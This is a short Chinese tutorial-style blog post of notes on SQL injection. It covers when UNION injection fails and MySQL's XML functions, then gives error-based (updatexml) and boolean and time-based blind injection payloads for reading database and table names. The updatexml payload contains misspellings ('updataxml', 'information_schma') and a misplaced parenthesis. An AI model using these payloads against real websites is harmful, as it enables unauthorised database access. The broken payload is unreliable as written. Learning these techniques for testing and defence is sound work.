4.SQL注入-错误注入与盲注
一.Union查询注入不使用的地方
1.注入语句无法截断,且不清楚完整的SQL查询语句;
2.页面不能返回查询信息的时候;
3.Web页面中有两个SQL查询语句,查询语句的列数不同;
二.关于MySQL处理XML
1.先准备以下XML内容
<class id="WNCDC085">
<student sequence="1">
<id>WNCD201703015</id>
<name>羽</name>
<sex>男</sex>
<age>24</age>
<degree>本科</degree>
<school>XX大学</school>
</student>
</class>
select extractvalue(testxml,'//student[@sequence="1"]/name') from xmltable;
update xmltable set testxml = updatexml(testxml,'//student[@sequence="1"]/name',"<name>雨</name>");
?id=1 and updataxml(1,concat(0x7e,(select group_concat(table_name)
from information_schma.tables,0x7e),1)
三.盲注
没有回显的时候
1.Boolean型注入
?id=1 and length(database())=5
?id=1 and (select substr(database(),1,1)='l')
2.时间型注入
?id=1 and if(length(database())=5,sleep(2),1);
?id=1 and if((select substr(database(),1,1)='l'),sleep(2),1);
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 分享一个免费、快速、无限量使用的满血 DeepSeek R1 模型,支持深度思考和联网搜索!
· 基于 Docker 搭建 FRP 内网穿透开源项目(很简单哒)
· 25岁的心里话
· ollama系列01:轻松3步本地部署deepseek,普通电脑可用
· 按钮权限的设计及实现